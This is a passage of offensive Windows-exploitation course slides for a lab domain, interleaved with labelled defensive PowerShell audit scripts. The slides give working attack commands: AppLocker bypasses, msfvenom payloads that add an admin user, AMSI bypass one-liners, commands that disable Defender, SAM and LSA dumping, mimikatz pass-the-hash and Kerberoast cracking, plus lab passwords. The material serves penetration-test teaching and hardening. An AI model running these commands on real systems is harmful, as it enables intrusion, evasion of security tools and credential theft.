to some arbitrary code (assuming it’s based on a blacklist/PATH configuration)
• Bypass Checker: https://mssec.wordpress.com/2015/10/22/applocker-bypass-checker/
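An added example (not course material): a PowerShell script that dumps the effective AppLocker policy on the host one rule per row and then asks Test-AppLockerPolicy whether a standard user could start the system binaries the following slides rely on. The cmdlets and XML layout are AppLocker's own; the list of candidate paths is this script's own selection.

```powershell
# Added example (not from the course): enumerate the effective AppLocker policy and test it.
# Read-only. Requires the AppLocker module (Windows 7 / Server 2008 R2 and later).
Import-Module AppLocker -ErrorAction Stop

$policy = Get-AppLockerPolicy -Effective          # local policy merged with GPO
[xml]$xml = Get-AppLockerPolicy -Effective -Xml   # same policy as XML for rule-by-rule listing

# One row per rule across all collections (Exe, Script, Msi, Dll, Appx)
$rules = foreach ($collection in $xml.AppLockerPolicy.RuleCollection) {
    foreach ($rule in $collection.ChildNodes) {
        $condition = foreach ($c in $rule.Conditions.ChildNodes) {
            switch ($c.LocalName) {
                'FilePathCondition'      { $c.Path }
                'FilePublisherCondition' { 'publisher=' + $c.PublisherName + ' product=' + $c.ProductName }
                'FileHashCondition'      { 'hash of ' + $c.FileHash.SourceFileName }
            }
        }
        [pscustomobject]@{
            Collection  = $collection.Type
            Enforcement = $collection.EnforcementMode   # Enabled, AuditOnly or NotConfigured
            Action      = $rule.Action
            Principal   = $rule.UserOrGroupSid          # S-1-1-0 = Everyone, S-1-5-32-544 = Administrators
            Condition   = ($condition -join '; ')
        }
    }
}
$rules | Sort-Object Collection, Action | Format-Table -AutoSize

# Would 'Everyone' (i.e. a standard user) be allowed to start these? Test-AppLockerPolicy needs
# files that exist, so the constructed list is filtered with Test-Path first.
$candidates = @(
    "$env:SystemRoot\System32\regsvr32.exe",
    "$env:SystemRoot\System32\rundll32.exe",
    "$env:SystemRoot\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
    "$env:SystemRoot\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
    "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe"
) | Where-Object { Test-Path -LiteralPath $_ }

Test-AppLockerPolicy -PolicyObject $policy -Path $candidates -User 'Everyone' |
    Select-Object FilePath, PolicyDecision, @{ n = 'MatchingRule'; e = { $_.MatchingRule.Name } } |
    Format-Table -AutoSize
```

A PolicyDecision of Allowed for regsvr32.exe, rundll32.exe or InstallUtil.exe with the default path rules is exactly what the next two slides exploit, and is fixed with an explicit Deny rule for those binaries for non-administrators.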
AppLocker: Enumeration
https://github.com/3gstudent/Bypass-Windows-AppL
ocker/blob/master/AppLockerBypassChecker-v1.ps1
AppLocker: Bypass Example #1
• Using regsvr32.exe || rundll32.exe to call a DLL
https://blog.didierstevens.com/2010/02/04/cmd-dll/
C:\Windows\System32\regsvr32.exe "c:\users\%username%\cmd.dll"
C:\Windows\System32\rundll32.exe c:\users\%username%\cmd.dll,Control_RunDLL
• Run PowerShell with DLLs only
https://github.com/p3nt4/PowerShdll
AppLocker: Bypass Example #2
Based on research from Casey Smith (@subTee) and techniques divulged by Black Hills
Information Security - http://www.blackhillsinfosec.com/?p=5257
[Condensed Overview]
1. Create a small C# program and define an entry point that will be used by InstallUtil.exe (the
actual bypass technique)
Note: The Install function requires privileges, whereas the Uninstall function doesn't
2. The C# code will call a PowerShell script that we will create
3. Use csc.exe (a compiler that comes with the .NET Framework) to compile the C# code
4. Create the PowerShell script that will be called by the C# program and define the desired
actions
5. Use InstallUtil.exe to run the compiled C# program
AppLocker: C# Example
[snip]
public class Program {
    // Entry point required by csc.exe; never called when the assembly is run through InstallUtil
    public static void Main() { }
}

[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer {
    // InstallUtil /U invokes Uninstall, which does not need the privileges Install requires
    public override void Uninstall(System.Collections.IDictionary savedState) {
        Mycode.Exec();
    }
}

public class Mycode {
    public static void Exec() {
        DO STUFF...
Exercise | Demo 5.2
• You have an RDP session as Bob on 192.168.X.17. Attempt to execute the following
commands on the host:
– whoami
– ipconfig /all
– net user
Going the extra mile:
• Try out different methods to get around AppLocker/GPO policies
AppLocker: Full Disclosure
• Bob is a member of plum\restricted_access
AppLocker: FAILSAFE
If, for any reason, you have not managed to execute code, the following failsafe has
been put into place
Logout from Bob’s RDP session and login as Alice - Alice is not as restricted by
AppLocker policies
• Username: plum\alice
• Password: Password12345!
IMPORTANT: Within the following challenges you will be required to substitute
C:\Users\Bob for C:\Users\Alice
Windows Exploitation Status
● Domain controller for plum.local
● Host is a member of plum.local
● Through enumeration we found plum\bob is a valid account
● Gained RDP access via:
  ○ plum\bob (Summer18)
● Overcame AppLocker restrictions and can run PowerShell scripts
Remote Exploitation
Windows Remote Exploitation: Exploit Code
• Exposed and vulnerable services; known OS vulnerabilities and unpatched systems
• MS17-010 the new MS08-067!
• Windows XP/2k3 - Windows 10/2k16
• Exploit video showing Fuzzbunch & EternalBlue - https://vimeo.com/213515673
Windows Remote Exploitation: Serialization
• DCOM uses serialization to communicate between processes
• CVE-2018-0824
– A remote code execution vulnerability exists in "Microsoft COM for Windows" when it fails to
properly handle serialized objects. An attacker who successfully exploited the vulnerability could
use a specially crafted file or script to perform actions.
• Remote Code Execution, but with user interaction as per the current PoCs in the wild.
Ref: https://codewhitesec.blogspot.com/2018/07/lethalhta.html
Windows Remote Exploitation: Responder
• https://github.com/lgandx/Responder
• '…Responder is an LLMNR (Link-Local Multicast Name Resolution), NBT-NS (NetBIOS
Name Service) and mDNS (Multicast Domain Name System) poisoner. It will answer
to specific NBT-NS queries based on their name suffix…'
• A multitude of options are available:
– SMB Auth Server
– WPAD Proxy Server
– HTTP/HTTPS Auth Servers
– FTP/POP3/IMAP/SMTP and DNS Servers
Windows Remote Exploitation: Responder
The Attack:
• A request for \\shared originates from 192.168.0.8
• 192.168.0.3 (a system running Responder) replies to NBT-NS, LLMNR and SMB
Windows Remote Exploitation: MultiRelay
• A tool to relay NTLMv1 & NTLMv2 authentication
• http://g-laurent.blogspot.co.uk/2016/10/introducing-responder-multirelay-10.html
The Attack:
1. Verify the target doesn’t have SMB signing enabled (MultiRelay checks for this)
2. Use Responder to poison responses (NBNS/LLMNR)
3. Run MultiRelay in tandem - this will be waiting for incoming connections
4. A privileged (or specifically targeted) user falls victim to Responder
5. Authentication is relayed to the chosen target
Attacker > Target A (LLMNR poisoned) > SMB auth relayed to Target B
https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
Windows Remote Exploitation: MultiRelay
Attacker: 192.168.10.208
Relay Host: 192.168.10.17
Victim: 192.168.11.17
Windows Remote Exploitation: Mitigation
Mitigation: Responder
• Disable LLMNR and NetBIOS
Windows Remote Exploitation: Mitigation
Mitigation: MultiRelay
• Policy: Enable SMB Signing (enabled by default only on Domain Controllers)
Server type or GPO* | Default value
Default Domain Policy | Not defined
Default Domain Controller Policy | Enabled
Stand-Alone Server Default Settings | Not defined
Member Server Effective Default Settings | Not defined
Client Computer Effective Default Settings | Disabled
*[source] https://technet.microsoft.com/en-us/library/jj852239(v=ws.11).aspx
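An added example (not course material): a PowerShell script that reports, and with -Enforce applies, both mitigations on a single Windows 8 / Server 2012 or later host: required SMB signing on the server and client side, LLMNR off, and NetBIOS over TCP/IP off on every IP-enabled adapter. The cmdlets, registry value and CIM method are the documented ones; the -Enforce switch and the function name are this script's own.

```powershell
# Added example (not from the course): audit and optionally enforce the Responder/MultiRelay
# mitigations on this host. Run elevated. Domain-wide the same settings are pushed by GPO
# (the signing policies in the table above and "Turn off multicast name resolution").
param([switch]$Enforce)

$llmnrKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'   # EnableMulticast = 0 turns LLMNR off

function Get-PoisoningPosture {
    $server = Get-SmbServerConfiguration
    $client = Get-SmbClientConfiguration
    $llmnr  = (Get-ItemProperty -Path $llmnrKey -Name EnableMulticast -ErrorAction SilentlyContinue).EnableMulticast
    # TcpipNetbiosOptions: 0 = via DHCP, 1 = enabled, 2 = disabled
    $nics   = Get-CimInstance Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE'
    [pscustomobject]@{
        SmbServerRequiresSigning = $server.RequireSecuritySignature   # "Digitally sign communications (always)", server side
        SmbClientRequiresSigning = $client.RequireSecuritySignature   # same policy for sessions this host initiates
        LlmnrDisabled            = ($llmnr -eq 0)
        NetbiosEnabledAdapters   = @($nics | Where-Object { $_.TcpipNetbiosOptions -ne 2 }).Count
    }
}

'Current posture:'
Get-PoisoningPosture | Format-List

if ($Enforce) {
    Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
    Set-SmbClientConfiguration -RequireSecuritySignature $true -Force
    New-Item -Path $llmnrKey -Force | Out-Null
    Set-ItemProperty -Path $llmnrKey -Name EnableMulticast -Value 0 -Type DWord
    Get-CimInstance Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE' |
        Invoke-CimMethod -MethodName SetTcpipNetbios -Arguments @{ TcpipNetbiosOptions = 2 } | Out-Null
    'After enforcement:'
    Get-PoisoningPosture | Format-List
}
```

With signing required on both sides MultiRelay's pre-check on step 1 of the attack fails, and with LLMNR and NetBIOS off there is no broadcast for Responder to answer in step 2.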
Privilege Escalation
Privilege Escalation: Techniques
• Low hanging fruit:
– Clear text passwords in files/scripts/registry
– Generous file permissions (verify items such as C:\, startup folder/programs)
• Focused attacks:
– Weak service configurations (permissions/binaries) and unquoted paths
– DLL hijacking (insecure library loading)
– Local exploits (e.g. MS16-032)
– Name resolution poisoning (NBT-NS/LLMNR)
– Kerberoasting
– Many, many more...
Windows Services: Interaction
• General commands/tools:
– MMC/GUI: services.msc
– Running services: net start
– Details on a specific service: sc qc %service_name%
• Using PowerShell:
– List running and stopped services: Get-Service
– Query a particular state:
Get-Service | Where-Object {$_.status -eq "stopped"}
– Query a particular service:
Get-Service | Where-Object {$_.name -eq "AppIDSvc"}
Windows Services: Exploitation
• Service binary in user writable location
• Replace binary with an attacker generated payload
• When the service runs it will execute your binary in the context of the account configured to
run the legitimate service
• As a standard user you may not have permissions to start/restart services
• However, if the service is set to auto-start we only need to force a system reboot...
Generating EXE Payloads: Examples
• MSFvenom: https://www.offensive-security.com/metasploit-unleashed/msfvenom/
msfvenom -p windows/adduser USER=john PASS=Password123! -f exe-service -a x86 --platform win > adduser.exe
• The exec payload signature seems 'less well known' ;-)
msfvenom -p windows/x64/exec CMD="cmd.exe /c \"net user john Password123! /add && net localgroup administrators john /add\"" -f exe-service > adduser.exe
• PowerUp.ps1: https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
Write-ServiceBinary -ServiceName '$target_service'
Install-ServiceBinary -ServiceName '$target_service'
• Bat2Exe: https://bat2exe.codeplex.com/ || py2exe: http://www.py2exe.org/
DLL Hijacking: Insecure Library Loading
• DLLs are searched for in specific locations (depending on whether safe DLL search mode is
enabled or disabled)
• Safe DLL search mode is enabled by default on Windows XP SP2 and later
• Search order (safe DLL search mode):
1. The directory from which the application loaded
2. 32-bit System directory (C:\Windows\System32)
3. 16-bit System directory (C:\Windows\System)
4. Windows directory (C:\Windows)
5. The current working directory (CWD)
6. Directories in the PATH environment variable (system then user)
Example: PureVPN Feb-2018 found vulnerable to dll hijacking and global writable dir
http://www.defensecode.com/advisories/DC-2018-02-001-PureVPN-Windows-Privilege-Escalation.pdf
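An added example (not course material) covering the Windows Services: Exploitation slide, this DLL hijacking slide and the AppLocker "writable location that permits execution" point in one read-only PowerShell audit: service binaries or their directories writable by low-privilege principals, unquoted service paths containing spaces, low-privilege writable directories on the machine PATH (step 6 of the search order), and writable directories under the roots the AppLocker default rules allow. The principal list, right mask and function names are this script's own choices; Win32_Service and the ACL classes are Windows' own.

```powershell
# Added example (not from the course): find writable-where-it-should-not-be locations.
# Run elevated for complete ACL visibility, or as a standard user to see what that user can reach.
$lowPriv   = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
# 'Write' = WriteData|AppendData|attribute writes; 0x40000000 = GENERIC_WRITE, 0x10000000 = GENERIC_ALL
$writeBits = [int][System.Security.AccessControl.FileSystemRights]'Write' -bor 0x40000000 -bor 0x10000000

function Test-LowPrivWrite([string]$Path) {
    # True when a low-privilege principal holds an Allow ACE with any write bit set
    if (-not $Path) { return $false }
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -eq 'Allow' -and $lowPriv -contains $ace.IdentityReference.Value -and
            (([int]$ace.FileSystemRights) -band $writeBits) -ne 0) { return $true }
    }
    return $false
}

function Get-ServiceBinary([string]$PathName) {
    # Quoted: the path inside the quotes. Unquoted: the shortest space-separated prefix that is a
    # file, which mirrors the ambiguity the service control manager resolves at start time.
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    $tokens = $PathName -split ' '
    for ($i = 1; $i -le $tokens.Count; $i++) {
        $candidate = $tokens[0..($i - 1)] -join ' '
        if (Test-Path -LiteralPath $candidate -PathType Leaf) { return $candidate }
    }
    return $tokens[0]
}

$serviceFindings = Get-CimInstance Win32_Service | ForEach-Object {
    if (-not $_.PathName) { return }
    $bin = Get-ServiceBinary $_.PathName
    $issues = @()
    if ($_.PathName -notmatch '^"' -and $bin -match ' ')   { $issues += 'unquoted path with spaces' }
    if (Test-LowPrivWrite $bin)                            { $issues += 'binary writable' }
    if (Test-LowPrivWrite (Split-Path -Path $bin -Parent)) { $issues += 'binary directory writable' }
    if ($issues) {
        [pscustomobject]@{ Service = $_.Name; RunsAs = $_.StartName; Start = $_.StartMode
                           Binary = $bin; Issues = ($issues -join '; ') }
    }
}

# Machine PATH (what SYSTEM services see), not the user's merged PATH
$pathFindings = [Environment]::GetEnvironmentVariable('Path', 'Machine') -split ';' |
    Where-Object { $_ } | ForEach-Object {
        $dir = [Environment]::ExpandEnvironmentVariables($_)
        if ((Test-Path -LiteralPath $dir -PathType Container) -and (Test-LowPrivWrite $dir)) {
            [pscustomobject]@{ Directory = $dir; Issue = 'low-privilege writable directory on the machine PATH' }
        }
    }

# AppLocker default path rules allow %PROGRAMFILES%\* and %WINDIR%\*; a low-privilege writable
# directory beneath them is a gap in a path-based policy (this walk is slow on large installs)
$allowedRoots = @($env:ProgramFiles, ${env:ProgramFiles(x86)}, $env:SystemRoot) | Where-Object { $_ }
$rootFindings = Get-ChildItem -LiteralPath $allowedRoots -Directory -Recurse -ErrorAction SilentlyContinue |
    Where-Object { Test-LowPrivWrite $_.FullName } | Select-Object -ExpandProperty FullName

'Services:';                      $serviceFindings | Format-Table -AutoSize
'Machine PATH:';                  $pathFindings    | Format-Table -AutoSize
'Writable under allowed roots:';  $rootFindings
```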
Exploit Code
• Sources: exploit-db.com / Metasploit / github.com / securityfocus.com
• Example: MS16-032 (@fuzzysec)
• Affected Systems: Windows 7 - 10 & Server 2008 - 2012 R2
PowerShell PoC https://www.exploit-db.com/exploits/39719/
Kerberoasting
What/Why/How?
• A Service Principal Name (SPN) is a unique identifier of a service instance*
• An SPN always includes the name of the host computer on which the service instance is running*
*https://msdn.microsoft.com/en-us/library/ms677949(v=vs.85).aspx
• In basic terms: a unique mapping/association of a service on a host to a logon account
• Many SPNs exist; some common examples include CIFS and MSSQL
• Sean Metcalf has created an SPN directory @ https://adsecurity.org/?page_id=183
• If we wanted to register an SPN...
https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/register-a-service-principal-name-for-kerberos-connections
Condensed Attack Overview:
1. Discover SPNs
2. Request a Kerberos service ticket for the selected target (part of this ticket is encrypted with a
key derived from the service account's password: its NTLM hash when RC4 is in use)
3. Crack offline using JTR or Hashcat!
Kerberoasting
• Introducing: Invoke-Kerberoast
https://raw.githubusercontent.com/EmpireProject/Empire/491328aafb59e0608c4720dbe4da05b9dc00aaa5/data/module_source/credentials/Invoke-Kerberoast.ps1
• Crack offline: ./hashcat64.bin -m 13100 hash wordlist.txt --rules OneRuleToRuleThemAll
• Tim Medin’s original work @ https://www.sans.org/summit-archives/file/summit-archive-1493862736.pdf
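An added example (not course material): the defender's inventory of what the attack on these two slides can reach, i.e. enabled user accounts carrying an SPN, with the attributes that decide how cheap the offline crack is (password age, whether RC4 tickets are still offered, privileged group membership). Read-only PowerShell using the ActiveDirectory module; the group names are the domain defaults, the bit values are those of msDS-SupportedEncryptionTypes, and the output field names are this script's own.

```powershell
# Added example (not from the course): Kerberoast exposure report for the current domain.
Import-Module ActiveDirectory -ErrorAction Stop

# Members of the privileged groups: an SPN on one of these is the worst case
$privileged = foreach ($g in 'Domain Admins', 'Enterprise Admins', 'Administrators') {
    Get-ADGroupMember $g -Recursive -ErrorAction SilentlyContinue | Select-Object -ExpandProperty SamAccountName
}

# msDS-SupportedEncryptionTypes bits: 0x4 = RC4-HMAC, 0x8 = AES128, 0x10 = AES256.
# Unset (0) means the KDC will still issue RC4 tickets, the kind hashcat mode 13100 cracks.
$exposure = Get-ADUser -Filter "ServicePrincipalName -like '*' -and Enabled -eq 'True'" `
                       -Properties ServicePrincipalName, PasswordLastSet, 'msDS-SupportedEncryptionTypes' |
    ForEach-Object {
        $enc = [int]($_.'msDS-SupportedEncryptionTypes')
        $age = $null
        if ($_.PasswordLastSet) { $age = [int]((Get-Date) - $_.PasswordLastSet).TotalDays }
        [pscustomobject]@{
            Account         = $_.SamAccountName
            Privileged      = ($privileged -contains $_.SamAccountName)
            PasswordAgeDays = $age                                   # gMSA/MSA accounts rotate automatically
            Rc4Offered      = ((($enc -band 0x18) -eq 0) -or (($enc -band 0x4) -ne 0))
            SPNs            = ($_.ServicePrincipalName -join ' ')
        }
    }

$exposure | Sort-Object Privileged, PasswordAgeDays -Descending | Format-Table -AutoSize

# Detection side: on the DC, event 4769 with TicketEncryptionType 0x17 (RC4) for one of these
# accounts is the request step 2 of the attack generates, and stands out once AES is the norm.
```

A privileged account with an old password and Rc4Offered = True is the one to move to a group managed service account, or at least to a long random password and AES-only encryption types.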
Privilege Escalation: Other Techniques
• A few methods we haven’t discussed…
– Cleartext Passwords (rough & ready example):
Get-ChildItem "C:\" -recurse -include *.txt, *.ps1, *.vbs,*.bat |
Select-String -pattern "password" | Group-Object path | select Name
– Scheduled Tasks:
• Specific binaries/scripts being called / check permissions
– Unattended Installation Files:
• Search for clear text or Base64 encoded passwords
• unattend.xml, unattend.txt, sysprep.xml, sysprep.inf
Privilege Escalation: Other Techniques
• Continued…
– AlwaysInstallElevated:
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
– Group Policy Preferences:
• Drives.xml, groups.xml, scheduledtasks.xml, services.xml, datasources.xml
• Search XML files for “cpassword”
• AES key published by Microsoft:
https://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be.aspx
• MS14-025 ‘fix’ disallows the storage of credentials
https://support.microsoft.com/en-us/help/2962486/ms14-025-vulnerability-in-group-policy-preferences-could-allow-elevation-of-privilege-may-13,-2014
• Exploits: Get-GPPPassword.ps1 / Metasploit / Scripts / Manual
Privilege Escalation: Auditing
• PowerUp by @harmj0y
https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
• Windows PrivEsc Check by @pentestmonkey
https://github.com/pentestmonkey/windows-privesc-check
• Manual analysis!
Exercise | Demo 5.3
• You have low privileged access as plum\bob to 192.168.X.17. Attempt to gain local
administrative rights on the host.
Going the extra mile:
• A domain account is vulnerable to the Kerberoasting attack - get the ticket and
crack this offline!
Privilege Escalation: FAILSAFE
If, for any reason, you have not managed to gain administrative privileges on the host,
the following failsafe has been put into place
• Username: .\default
• Password: @dm1n
Windows Exploitation Status
● Domain controller for plum.local
● Host is a member of plum.local
● Through enumeration we found plum\bob is a valid account
● Gained RDP access via:
  ○ plum\bob (Summer18)
● Overcame AppLocker restrictions and can run PowerShell scripts
● Escalated privs and added local admin via weak service binary permissions
  ○ john (Password123!)
Antivirus/AMSI Bypass Techniques & Post Exploitation
Post Exploitation: AV Bypass
Common methods for bypassing Antivirus Products:
• Add an exclusion
• Disable AV Services
• Kill AV Processes
• Run code in memory
• Use script payloads (bat, vbs, ps1) instead of exe
• Take the automated approach:
– Veil-Evasion: https://github.com/Veil-Framework/Veil-Evasion
– Shellter: https://www.shellterproject.com/ (supported in Kali)
Post Exploitation: AV Bypass (Shellter)
1) Backdoor the binary
2) Check it's clean… test with different AV products
3) If it doesn't go to plan at first, test with different tools/features/payloads
Post Exploitation: AMSI
“...AMSI is antimalware vendor agnostic, designed to allow for the most
common malware scanning and protection techniques provided by today's
antimalware products that can be integrated into applications. It supports
a calling structure allowing for file and memory or stream scanning,
content source URL/IP reputation checks, and other techniques…”
[source] https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx
Post Exploitation: Disable AMSI/AV
• Requirements: An elevated shell
DisableRealtimeMonitoring - indicates whether to use real-time protection:
Set-MpPreference -DisableRealtimeMonitoring $true
DisableIOAVProtection - indicates whether Windows Defender scans all downloaded files and attachments:
Set-MpPreference -DisableIOAVProtection $true
[source] https://technet.microsoft.com/en-us/library/dn433291.aspx
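An added example (not course material): the defender's view of the two Set-MpPreference changes above, as a read-only PowerShell check that reads the current preferences and engine state and pulls the Defender operational-log events that record such changes. The cmdlets, properties and event IDs are Windows Defender's own; the output field names are this script's.

```powershell
# Added example (not from the course): detect the Set-MpPreference changes shown above.
$pref   = Get-MpPreference
$status = Get-MpComputerStatus
[pscustomobject]@{
    DisableRealtimeMonitoring = $pref.DisableRealtimeMonitoring    # the two preferences the slide sets
    DisableIOAVProtection     = $pref.DisableIOAVProtection
    RealTimeProtectionEnabled = $status.RealTimeProtectionEnabled  # what the engine actually reports
    AMServiceEnabled          = $status.AMServiceEnabled
    TamperProtected           = $status.IsTamperProtected          # property absent on builds before 1809
    ExclusionPaths            = ($pref.ExclusionPath -join '; ')   # an added exclusion shows up here
} | Format-List

# Operational-log events that record such changes: 5001 = real-time protection disabled,
# 5007 = configuration changed (exclusions, IOAV and similar switches). Run elevated on hardened hosts.
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Windows Defender/Operational'; Id = 5001, 5007 } `
             -MaxEvents 50 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, @{ n = 'Detail'; e = { ($_.Message -split "`n")[0] } } |
    Format-Table -AutoSize -Wrap
```

Forwarding 5001/5007 to a central log is what turns the elevated-shell step above into an alert rather than a silent change.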
Post Exploitation: Bypass AMSI
• Hmm but what if we need to bypass AMSI to gain privileges?!
– Use PowerShell version 2: AMSI isn’t supported
– But on a default Windows 10 installation…
– Make use of the NULL character
http://standa-note.blogspot.co.uk/2018/02/amsi-bypass-with-null-character.html
– Code manipulation: Change the signature of the script
• Change the script name || remove comments || change function and
variable names
• An excellent write-up using these techniques
http://www.blackhillsinfosec.com/?p=5555
Post Exploitation: Bypass AMSI
• #1 A one-liner from Matt Graeber (@mattifestation)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
• #2 Another one-liner from @mattifestation
[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').GetValue($null),0x41414141)
• Drop a custom DLL - amsi.dll - into the path from where you load your tools
(remember those DLL Hijacking slides…)
https://cn33liz.blogspot.co.uk/2016/05/bypassing-amsi-using-powershell-5-dll.html
Post Exploitation: Exfiltration of Credentials
On a Windows host there are a number of interesting targets:
• Security Accounts Manager (SAM)
• Cached Domain Credentials
• Local Security Authority Secrets (LSASecrets)
• Active Logons
Security Accounts Manager (SAM)
What/Where/Who is SAM?
• SAM is located at: %SystemRoot%\System32\config\SAM
• On a DC; Active Directory data is stored at: %SystemRoot%\NTDS\ntds.dit
Exfiltration:
• Using built-in tools: reg save HKLM\SAM SAM_SAVE
• Metasploit: Meterpreter has the ability to extract hashes via the hashdump command
• PowerShell:
– Nishang: Get-PassHashes
– Empire: Invoke-PowerDump
• A number of alternative tools are also available (samdump, pwdumpx, pwdump, fgdump, gsecdump)
Remember: the hash will be in the format
USERNAME:RID:LM:NTLM:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:99551acff8834268e489bb3054af94fd:::
Cached Domain Credentials
• Cached Domain Credentials are the ONLY password hashes in Windows to be salted
• The salt is the username
• Cached Domain Credentials are encrypted with the LSA secret NL$KM, so we'll need to extract this
value and decrypt the credentials before we can then attack these hashes
Local Security Authority (LSA) Secrets
• LSA secrets is protected storage and may include sensitive data such as:
– Passwords for services configured to run under the context of a user account
– Passwords configured for scheduled tasks
– and a lot more...
• PowerShell (32-bit payload):
– Enable-TSDuplicateToken originally by Truesec (also included within Nishang as
Enable-DuplicateToken) is needed to duplicate the access token of LSASS
– Get-LSASecret (within Nishang) can then be used to gather the secrets
• Mimikatz:
– privilege::debug & token::elevate
– lsadump::secrets
Active Logons
• Certain Windows services/processes store the credentials of logged-on users in memory in an
encrypted form (OS dependent)*
• These can be decrypted and the "clear-text" passwords of active logged-on users can be obtained
• Windows 8.1/2k12r2 and later don't store clear-text credentials in LSA memory by default
(detailed overview of OS behaviour @ https://www.slideshare.net/camsec/cleartext-and-pth-still-alive)
• If we have administrative access to a target system, we can force a change and wait for the user to
re-enter their credentials
[reference]: https://blogs.technet.microsoft.com/kfalde/2014/11/01/kb2871997-and-wdigest-part-1/
Windows Authentication
NTLM Challenge/Response*
• The client authenticates using their credentials - the hash of their password is calculated and stored.
Their username is sent in cleartext
• The server generates a 16-byte challenge
• The client encrypts the challenge with the hash of the user's password, and this is the response sent
to the server
• The server then sends the username, the original challenge that was sent to the client (step 2 above)
and the client's response to a domain controller (DC)
• The DC performs a lookup of the user to retrieve the hash and uses this to encrypt the challenge
• The DC then compares the two responses, i.e. the client's response with the DC's calculated response.
If they are equal, then access is granted
*[source] https://msdn.microsoft.com/en-gb/library/windows/desktop/aa378749(v=vs.85).aspx
Windows Authentication
1. Username sent (hash calculated + stored locally)
2. 16-byte challenge sent to client
3. Client encrypts challenge with hash and sends back
4. Server passes (1), (2) and (3) to DC
5. DC looks up username (1), retrieves corresponding hash and encrypts the original challenge (2).
DC compares its own calculation with (3). If it’s a match, the user is who they say they are!
*[source] https://blogs.sans.org/computer-forensics/files/2012/09/netauth-5.png
Pass the Hash (PtH)
Windows systems allow authentication using hashes - we don’t need the plaintext password!
• Metasploit:
– auxiliary/scanner/smb/smb_login (SMB)
– exploit/windows/smb/psexec (SMB)
• PowerShell:
– Invoke-TheHash - https://github.com/Kevin-Robertson/Invoke-TheHash (WMI & SMB)
– Invoke-Mimikatz - https://github.com/EmpireProject/Empire
• Mimikatz:
– sekurlsa::pth /user:kevin /domain:plum.local /ntlm:80de0b25034cbe9a63df9d8dfcdaadf3 /run:powershell.exe
Exercise | Demo 5.4
• On 192.168.X.17 gain access to the NTLM hash of plum\kevin
Exercise | Demo 5.5
• On 192.168.X.17 gain access to the cleartext password of plum\backupsvc
Pass the Hash (PtH): Restrictions
• Microsoft introduced new restrictions in 2871997 back in 2014
*https://technet.microsoft.com/en-us/library/security/2871997.aspx
Restrictions included (amongst many others)…
*“...This feature reduces the attack surface of domain credentials in the LSA. Changes
to this feature include: prevent network logon and remote interactive logon to
domain-joined machine using local accounts...”
• So...local admin accounts can no longer remotely authenticate to a host (excluding
default RID 500)
Pass the Hash (PtH): Restrictions
• However, if we have administrative access to the host we can make a registry
change and then it’s business as usual:
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System”
Type: DWORD (32-bit)
Name: LocalAccountTokenFilterPolicy
Data: 1
Extra Protection
• Restricted Admin Mode:
https://blogs.technet.microsoft.com/kfalde/2013/08/14/restricted-admin-mode-for-rdp-in-windows-8-1-2012-r2/
• Utilize the Protected Users group:
https://technet.microsoft.com/en-us/library/dn466518(v=ws.11).aspx
– Members can’t authenticate using NTLM, Digest Auth or CredSSP
– Passwords are not cached
– Kerberos AES support only (DES and RC4 excluded)
– Account cannot be delegated
– Reduced TGT lifetime (4 hours)
• Credential Guard has been introduced in Windows 10 Enterprise & Server 2016
https://technet.microsoft.com/en-us/itpro/windows/keep-secure/credential-guard
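An added example (not course material): a read-only PowerShell audit of the protections on the last few slides, on the host (LocalAccountTokenFilterPolicy, WDigest caching, Restricted Admin mode, Credential Guard) and in the domain (privileged accounts missing from Protected Users). The registry values, CIM class and group names are the documented defaults; the output field names are this script's own.

```powershell
# Added example (not from the course): credential-protection posture of this host and domain.
function Get-RegValue([string]$Path, [string]$Name) {
    (Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue).$Name
}

$posture = [ordered]@{}
# KB2871997 behaviour: a value of 1 re-enables remote admin logons for non-RID-500 local accounts
$posture.LocalAccountTokenFilterPolicy = Get-RegValue 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' 'LocalAccountTokenFilterPolicy'
# WDigest: 1 makes LSASS keep clear-text credentials again on 8.1/2012 R2 and later; absent or 0 is the secure default
$posture.WDigestUseLogonCredential   = Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' 'UseLogonCredential'
# Restricted Admin mode for RDP is on only when DisableRestrictedAdmin exists and is 0
$posture.RestrictedAdminMode         = ((Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' 'DisableRestrictedAdmin') -eq 0)
# Credential Guard reports as security service 1 in Win32_DeviceGuard.SecurityServicesRunning
$dg = Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
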